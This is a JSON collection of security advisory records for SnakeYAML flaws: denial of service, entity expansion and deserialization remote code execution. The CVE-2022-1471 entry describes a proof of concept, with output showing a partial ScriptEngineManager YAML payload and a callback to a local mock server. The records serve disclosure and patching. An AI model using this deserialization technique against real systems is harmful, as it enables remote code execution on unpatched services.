{ "schema_version": "1.7.3", "id": "GHSA-c4r9-r8fh-9vj2", "published": "2022-09-06T00:00:27Z", "modified": "2024-03-15T12:49:34.373482Z", "aliases": [ "CVE-2022-38749" ], "related": [ "CGA-8qv6-x47g-j5ch", "CGA-pc67-qgg2-hpmq", "CGA-prmx-f7v5-87x2" ], "summary": "snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "be.cylab:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/be.cylab/snakeyaml" }, "versions": [ "1.25.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "com.alipay.sofa.acts:acts-common-util", "ecosystem": "Maven", "purl": "pkg:maven/com.alipay.sofa.acts/acts-common-util" }, "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "io.prometheus.jmx:jmx_prometheus_httpserver", "ecosystem": "Maven", "purl": "pkg:maven/io.prometheus.jmx/jmx_prometheus_httpserver" }, "versions": [ "0.17.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "io.prometheus.jmx:jmx_prometheus_httpserver_java6", "ecosystem": "Maven", "purl": "pkg:maven/io.prometheus.jmx/jmx_prometheus_httpserver_java6" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "0.18.0" } ] } ], "versions": [ "0.17.0", "0.17.1", "0.17.2", "0.18.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "org.testifyproject.external:external-snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.testifyproject.external/external-snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.0.6" } ] } ], "versions": [ "0.9.5", "0.9.6", "0.9.7", "0.9.8", "0.9.9", "1.0.0", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "pl.droidsonroids.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/pl.droidsonroids.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.18.2" } ] } ], "versions": [ "1.18-android", "1.18.1", "1.18.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38749" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/525/got-stackoverflowerror-for-many-open" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47024" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-15T03:27:43Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hhhw-99gj-p3c3", "published": "2022-09-06T00:00:27Z", "modified": "2024-03-15T12:49:06.729862Z", "aliases": [ "CVE-2022-38750" ], "related": [ "CGA-5jp4-3j6v-xcj7", "CGA-67vf-v8g4-c73c", "CGA-xgv4-vx4w-mxg9" ], "summary": "snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-hhhw-99gj-p3c3/GHSA-hhhw-99gj-p3c3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38750" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/526/stackoverflow-oss-fuzz-47027" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47027" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-16T21:17:07Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mjmj-j48q-9wg2", "published": "2022-12-12T21:19:47Z", "modified": "2025-06-18T18:37:13.356609Z", "aliases": [ "CVE-2022-1471" ], "related": [ "CGA-23vr-f599-cmcv", "CGA-4j46-m77j-2622", "CGA-7w78-ggr5-pfxv", "CGA-7xrx-m75c-pc58", "CGA-g9mf-8vr4-m7x9", "CGA-gmmv-497r-8r6h", "CGA-mhgw-xcxh-mprj", "CGA-p6jg-fjvm-fx3w", "CGA-r36x-jx84-2cgp", "CVE-2022-1471" ], "summary": "SnakeYaml Constructor Deserialization Remote Code Execution", "details": "### Summary\nSnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows\nany type be deserialized given the following line:\n\nnew Yaml(new Constructor(TestDataClass.class)).load(yamlContent);\n\nTypes do not have to match the types of properties in the\ntarget class. A `ConstructorException` is thrown, but only after a malicious\npayload is deserialized.\n\n### Severity\nHigh, lack of type checks during deserialization allows remote code execution.\n\n### Proof of Concept\nExecute `bash run.sh`. The PoC uses Constructor to deserialize a payload\nfor RCE. RCE is demonstrated by using a payload which performs a http request to\nhttp://127.0.0.1:8000.\n\nExample output of successful run of proof of concept:\n\n```\n$ bash run.sh\n\n[+] Downloading snakeyaml if needed\n[+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE\nnc: no process found\n[+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server.\n[+] An exception is expected.\nException:\nCannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0\n in 'string', line 1, column 1:\n payload: !!javax.script.ScriptEn ... \n ^\nCan not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n in 'string', line 1, column 10:\n payload: !!javax.script.ScriptEngineManag ... \n ^\n\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)\n\tat org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)\n\tat org.yaml.snakeyaml.Yaml.load(Yaml.java:416)\n\tat Main.main(Main.java:37)\nCaused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)\n\tat java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)\n\tat java.base/java.lang.reflect.Field.set(Field.java:780)\n\tat org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)\n\t... 9 more\n[+] Dumping Received HTTP Request. Will not be empty if PoC worked\nGET /proof-of-concept HTTP/1.1\nUser-Agent: Java/11.0.14\nHost: localhost:8000\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\nConnection: keep-alive\n```\n\n### Further Analysis\nPotential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.\n\nSee https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.\n\n### Timeline\n**Date reported**: 4/11/2022\n**Date fixed**: [30/12/2022](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44)\n**Date disclosed**: 10/13/2022", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.0" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.31", "1.32", "1.33", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.33", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-mjmj-j48q-9wg2/GHSA-mjmj-j48q-9wg2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1471" }, { "type": "WEB", "url": "https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true" }, { "type": "WEB", "url": "https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0015" }, { "type": "WEB", "url": "https://infosecwriteups.com/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4c" }, { "type": "WEB", "url": "https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc" }, { "type": "WEB", "url": "https://github.com/mbechler/marshalsec" }, { "type": "WEB", "url": "https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/wiki/CVE-2022-1471" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64876314" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64634374" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/acc44099f5f4af26ff86b4e4e4cc1c874e2dc5c4" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/5014df1a36f50aca54405bb8433bc99a8847f758" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/11/19/1" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-12-12T21:19:47Z", "nvd_published_at": "2022-12-01T11:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rvwf-54qp-4r6v", "published": "2021-06-04T21:37:45Z", "modified": "2024-03-15T05:36:20.539640Z", "aliases": [ "CVE-2017-18640" ], "summary": "SnakeYAML Entity Expansion during load operation", "details": "The Alias feature in SnakeYAML 1.18 allows entity expansion during a load operation, a related issue to CVE-2003-1564.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.26" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-rvwf-54qp-4r6v/GHSA-rvwf-54qp-4r6v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18640" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb2a7037366c58bac6aec6ce3df843a11ef97ae4eb049f05f410eaa5@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc3211c71f7e0973a1825d1988a3921288c06cd9d793eae97ecd34948@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbaa1f513d903c89a08267c91d86811fa5bcc82e0596b6142c5cea7ea@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7b28ac741e32dd5edb2c22485d635275bead7290b056ee56baf8ce0@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5c33d0069c927fae16084f0605895b98d231d7c48527bcb822ac48c@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb34d8d3269ad47a1400f5a1a2d8310e13a80b6576ebd7f512144198d@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb0e033d5ec8233360203431ad96580cf2ec56f47d9a425d894e279c2@%3Cpr.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raebd2019b3da8c2f90f31e8b203b45353f78770ca93bfe5376f5532e@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r900e020760c89f082df1c6e0d46320eba721e4e47bb9eb521e68cd95@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b57c57cffa01e418868a3c7535b987635ff1fb5ab534203bfa2d64a@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8464b6ec951aace8c807bac9ea526d4f9e3116aa16d38be06f7c6524@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ce3de03facf7e7f3e24fc25d26d555818519dafdb20f29398a3414b@%3Cdev.phoenix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72a3588d62b2de1361dc9648f5d355385735e47f7ba49d089b0e680d@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d54c2da792c74cc14b9b7665ea89e144c9e238ed478d37fd56292e6@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c91e52b3cc9f4e64afe0f34f20507143fd1f756d12681a56a9b38da@%3Ccommits.pulsar.apache.org%3E" }, { "type": "PACKAGE", "url": "https://bitbucket.org/asomov/snakeyaml" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb4b61dbe2ed1c7a88781a9aff5a9e7342cc7ed026aec0418ee67596@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce5c93bba6e815fb62ad38e28ca1943b3019af1eddeb06507ad4e11a@%3Ccommits.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd582c64f66c354240290072f340505f5d026ca944ec417226bb0272e@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd34c0479587e32a656d976649409487d51ca0d296b3e26b6b89c3f5@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re791a854001ec1f79cd4f47328b270e7a1d9d7056debb8f16d962722@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re851bbfbedd47c690b6e01942acb98ee08bd00df1a94910b905bc8cd@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb1751562ee5146d3aca654a2df76a2c13d8036645ce69946f9c219e@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/recfe569f4f260328b0036f1c82b2956e864d519ab941a5e75d0d832d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf95bebee6dfcc55067cebe8482bd31e6f481d9f74ba8e03f860c3ec7@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe0aab6c3bebbd9cbfdedb65ff3fdf420714bcb8acdfd346077e1263@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CKN7VGIKTYBCAKYBRG55QHXAY5UDZ7HA" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PTVJC54XGX26UJVVYCXZ7D25X3R5T2G6" }, { "type": "WEB", "url": "https://mvnrepository.com/artifact/org.yaml/snakeyaml/1.25/usages" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/commits/da11ddbd91c1f8392ea932b37fa48110fa54ed8c" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/wiki/Billion%20laughs%20attack" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/wiki/Changes" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/377" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/wiki/Changes" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1058e7646988394de6a3fd0857ea9b1ee0de14d7bb28fee5ff782457@%3Ccommits.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r154090b871cf96d985b90864442d84eb027c72c94bc3f0a5727ba2d1@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16ae4e529401b75a1f5aa462b272b31bf2a108236f882f06fddc14bc@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1703a402f30c8a2ee409f8c6f393e95a63f8c952cc9ee5bf9dd586dc@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r182e9cf6f3fb22b9be0cac4ff0685199741d2ab6e9a4e27a3693c224@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r191ceadb1b883357384981848dfa5235cb02a90070c553afbaf9b3d9@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1aab47b48a757c70e40fc0bcb1fcf1a3951afa6a17aee7cd66cf79f8@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dfac8b6a7097bcb4979402bbb6e2f8c36d0d9001e3018717eb22b7e@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1ffce2ed3017e9964f03ad2c539d69e49144fc8e9bf772d641612f98@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r20350031c60a77b45e0eded33e9b3e9cb0cbfc5e24e1c63bf264df12@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22ac2aa053b7d9c6b75a49db78125c9316499668d0f4a044f3402e2f@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r28c9009a48d52cf448f8b02cd823da0f8601d2dff4d66f387a35f1e0@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a5b84fdf59042dc398497e914b5bb1aed77328320b1438144ae1953@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2b05744c0c2867daa5d1a96832965b7d6220328b0ead06c22a6e7854@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2db207a2431a5e9e95e899858ab1f5eabd9bcc790a6ca7193ae07e94@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r436988d2cfe8a770ae361c82b181c5b2bf48a249bad84d8a55a3b46e@%3Cdev.phoenix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r465d2553a31265b042cf5457ef649b71e0722ab89b6ea94a5d59529b@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c682fb8cf69dd14162439656a6ebdf42ea6ad0e4edba95907ea3f14@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d7f37da1bc2df90a5a0f56eb7629b5ea131bfe11eeeb4b4c193f64a@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5510f0125ba409fc1cabd098ab8b457741e5fa314cbd0e61e4339422@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55d807f31e64a080c54455897c20b1667ec792e5915132c7b7750533@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r56805265475919252ba7fc10123f15b91097f3009bae86476624ca25@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r643ba53f002ae59068f9352fe1d82e1b6f375387ffb776f13efe8fda@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r666f29a7d0e1f98fa1425ca01efcfa86e6e3856e01d300828aa7c6ea@%3Ccommits.pulsar.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-776" ], "github_reviewed": true, "github_reviewed_at": "2021-06-04T21:34:16Z", "nvd_published_at": "2019-12-12T03:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w37g-rhq8-7m4j", "published": "2022-11-11T19:00:31Z", "modified": "2024-06-25T02:34:20.451152Z", "aliases": [ "CVE-2022-41854" ], "related": [ "CGA-7rjv-f2q6-55mp", "CGA-vgmg-hv2p-g7h8", "CGA-vgwv-c777-jqwv", "CGA-w2jj-p5v7-324x" ], "summary": "Snakeyaml vulnerable to Stack overflow leading to denial of service", "details": "Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.32" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.31", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-w37g-rhq8-7m4j/GHSA-w37g-rhq8-7m4j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41854" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/e230a1758842beec93d28eddfde568c21774780a" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/531" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50355" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0009" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-11-21T22:27:27Z", "nvd_published_at": "2022-11-11T13:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": 